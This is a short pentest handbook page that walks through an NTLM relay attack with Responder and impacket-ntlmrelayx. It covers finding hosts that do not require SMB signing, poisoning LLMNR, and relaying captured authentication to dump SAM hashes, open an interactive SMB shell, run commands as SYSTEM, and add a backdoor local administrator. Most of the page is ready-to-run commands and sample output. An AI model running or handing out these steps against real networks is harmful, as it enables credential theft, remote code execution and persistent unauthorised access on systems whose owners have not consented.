Handbook

NTLM Relay

Updated 29 Sept 2026Services✎ Suggest a change
On this page

NTLM Relay (via ntlmrelayx)

Requirements

  • SMB signing disabled or not required on target
  • Relayed user has local admin rights on target
  • Same network segment as victims

Attack Flow

plain text
Victim LLMNR broadcast → Responder poisons (SMB/HTTP off) → ntlmrelayx relays auth to target → Shell / SAM dump / command exec

Step 0 - Identify Vulnerable Hosts

bash
# Nmap
nmap --script=smb2-security-mode.nse -p445 10.10.10.0/24 -Pn
plain text
Message signing enabled but not required  ← VULNERABLE
Message signing enabled and required      ← SKIP
bash
# CrackMapExec — auto-generates targets.txt
nxc smb 10.10.10.0/24 --gen-relay-list targets.txt

Step 1 - Configure Responder

bash
sudo mousepad /etc/responder/Responder.conf

Set:

plain text
SMB = Off
HTTP = Off
bash
cat /etc/responder/Responder.conf | grep -E "SMB|HTTP"

Step 2 - Start ntlmrelayx (before Responder)

SAM dump (default):

bash
impacket-ntlmrelayx -tf targets.txt -smb2support
plain text
[*] Authenticating against 192.168.1.100 as MARVEL\fcastle SUCCEED
[+] Administrator:500:aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SAM format: username:RID:LM:NTLM — crack NTLM with Hashcat mode 1000

Interactive SMB shell:

bash
impacket-ntlmrelayx -tf targets.txt -smb2support -i
plain text
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
bash
nc 127.0.0.1 11000
bash
shares
use C$
ls

Execute a command:

bash
impacket-ntlmrelayx -tf targets.txt -smb2support -c "whoami"
plain text
[*] Executed specified command on host: 192.168.1.100
nt authority\system

Create backdoor admin:

bash
impacket-ntlmrelayx -tf targets.txt -smb2support -c "net user hacker Password123! /add && net localgroup administrators hacker /add"

Step 3 - Run Responder

bash
sudo responder -I eth0 -dw 2>&1 | tee responder_output.txt
plain text
[*] [LLMNR] Poisoned answer sent to 192.168.1.105 for name FIELSERVR

Flag Reference

FlagMeaning
-tf targets.txtList of IPs to relay credentials to
-smb2supportEnable SMB2 support
-iSpawn interactive SMB shell
-c "<cmd>"Execute command on target after relay